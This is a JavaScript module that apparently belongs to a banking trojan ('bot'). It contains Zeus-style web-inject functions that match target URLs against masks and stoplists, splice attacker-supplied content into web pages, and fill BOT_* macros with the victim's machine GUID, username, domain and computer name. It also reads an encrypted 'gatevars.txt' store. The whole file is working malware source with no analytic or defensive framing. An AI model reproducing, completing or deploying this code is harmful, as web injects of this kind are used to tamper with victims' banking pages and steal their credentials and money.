

function zeusSearchContentIndex(data, mask, startOffset) {
    var searchParts = mask.split('*');
    var firstIndex = data.indexOf(searchParts[0], startOffset);
    var lstIndex = firstIndex + searchParts[0].length;
    var result;

    for (var i = 1; i < searchParts.length; i++) {
        lstIndex = data.indexOf(searchParts[i], lstIndex);
        if (lstIndex === -1) {
            break;
        }

        lstIndex += searchParts[i].length;
    }

    if (lstIndex !== -1 && searchParts[searchParts.length - 1] === '') {
        lstIndex = data.length;
    }

    if (lstIndex !== -1 && firstIndex !== -1 && firstIndex < lstIndex) {
        result = data.substr(firstIndex, lstIndex - firstIndex);
    }

    return result;
}
function zeusExecuteInjection(data, injectionBlock) {

    var startTag;
    var startTagIndex;
    var endTag;
    var endTagIndex;

    if ((injectionBlock.data_before.length > 0) && (injectionBlock.data_after.length > 0)) {

        startTag = zeusSearchContentIndex(data, injectionBlock.data_before);
        endTag = zeusSearchContentIndex(data, injectionBlock.data_after);

        if (startTag && endTag) {

            startTagIndex = (data.indexOf(startTag) + startTag.length);
            endTagIndex = data.indexOf(endTag, startTagIndex);

            if (startTagIndex < endTagIndex) {
                return data
                    .cut(startTagIndex, endTagIndex)
                    .insertAt(startTagIndex, injectionBlock.data_inject);

            } else {
                //print('invalid injection data (startTagIndex > endTagIndex)');
            }
        } else {
            //print('[start] or [end] not found');
        }

    } else if (injectionBlock.data_before.length > 0) {
        startTag = zeusSearchContentIndex(data, injectionBlock.data_before);
        if (startTag) {
            startTagIndex = (data.indexOf(startTag) + startTag.length);
            return data.insertAt(startTagIndex, injectionBlock.data_inject);
        } else {
            return data;
        }
    } else if (injectionBlock.data_after.length > 0) {
        endTag = zeusSearchContentIndex(data, injectionBlock.data_after);
        if (endTag) {
            endTagIndex = data.indexOf(endTag);
            return data.insertAt(endTagIndex, injectionBlock.data_inject);
        } else {
            return data;
        }

    } else {
        return injectionBlock.data_inject;
    }
}

function zeusIsModificationNeeded(url, mask) {
    if (zeusSearchContentIndex(url, mask) === url) {
        return true;
    }
    return false;
}


function zeusIsMaskMatched(text, mask) {
    if (typeof zeusSearchContentIndex(text, mask) !== 'undefined') {
        return true;
    }
    return false;
}


function isRegexMatched(str, restr) {
    try {
        var re = new RegExp(restr, "ig");
        if (str.match(re)) {
            return true;
        }
    } catch (exception) { }

    return false;
}

function isUrlMatchedInRule(murl, inject) {

    if (inject.base.guids) {
        if (inject.base.guids.find(function (element) {
            return (inject.base.guids.indexOf(
                process.machineGuid.toLowerCase()) !== -1
            );
        })) {
            return false;
        }
    }

    if (!inject.base.url.find(function (element) {
        return zeusIsModificationNeeded(murl.toLowerCase(), element.toLowerCase());
    })) {
        return false;
    }

    if (inject.stoplist && inject.stoplist.length > 0) {
        if (inject.stoplist.find(function (element){
            if (element.charAt(0) === '@') {
                return isRegexMatched(murl,
                    element.substring(1));
            } else {
                return zeusIsMaskMatched(murl,
                    element);
            }
        })) {
            //console.log("isUrlMatchedInRule : stoplist trigger")
            return false;
        }
    }
    return true;
}


function ReplaceStandartMacroses(str, recordingHostname) {
    var retval = str;

    if (typeof (process.machineGuid) === 'string') {
        retval = retval.replace(/BOT_MACHINE_UUID/g, process.machineGuid);
    }

    retval = retval.replace(/BOT_MACHINE_DATE/g, new Date().toJSON());
    retval = retval.replace(/BOT_MACHINE_TIMESTAMP/g, Math.round(+new Date() / 1000));
    retval = retval.replace(/BOT_USERNAME/g, process.currentUser);
    retval = retval.replace(/BOT_USERDOMAIN/g, process.env['USERDOMAIN']);
    retval = retval.replace(/BOT_COMPUTERNAME/g, process.env['COMPUTERNAME']);
    retval = retval.replace(/BOT_VERSION/g, process.g_botId);
    retval = retval.replace(/BOT_PROCESS/g, process.currentBinary);
    retval = retval.replace(/BOT_PROCESS_ID/g, process.pid);
    retval = retval.replace(/BOT_PROCESS_PATH/g, process.execPath);
    retval = retval.replace(/BOT_RANDOM_STRING/g, Math.random().toString(36).substring(7));
    retval = retval.replace(/BOT_RANDOM_NUMBER/g, Math.floor(Math.random() * (0xAFFFFFF - 0 + 1)));

    var storedObjects = process.FsReadObjectEncrypted('gatevars.txt');
    if (storedObjects) {
        for (var i in storedObjects) {
            retval = retval.split(i).join(storedObjects[i]);
        }
    }
    if (recordingHostname) {
        retval = retval.replace('%HOSTNAME%', recordingHostname)
    }

    retval = retval.replace('%DATE%', require('utils').getCurrentDateFilenameString())


    return retval;
}

exports.ReplaceStandartMacroses = ReplaceStandartMacroses;
exports.isUrlMatchedInRule = isUrlMatchedInRule;
exports.zeusIsMaskMatched = zeusIsMaskMatched;
exports.zeusIsModificationNeeded = zeusIsModificationNeeded;
exports.zeusExecuteInjection = zeusExecuteInjection;
exports.zeusSearchContentIndex = zeusSearchContentIndex;
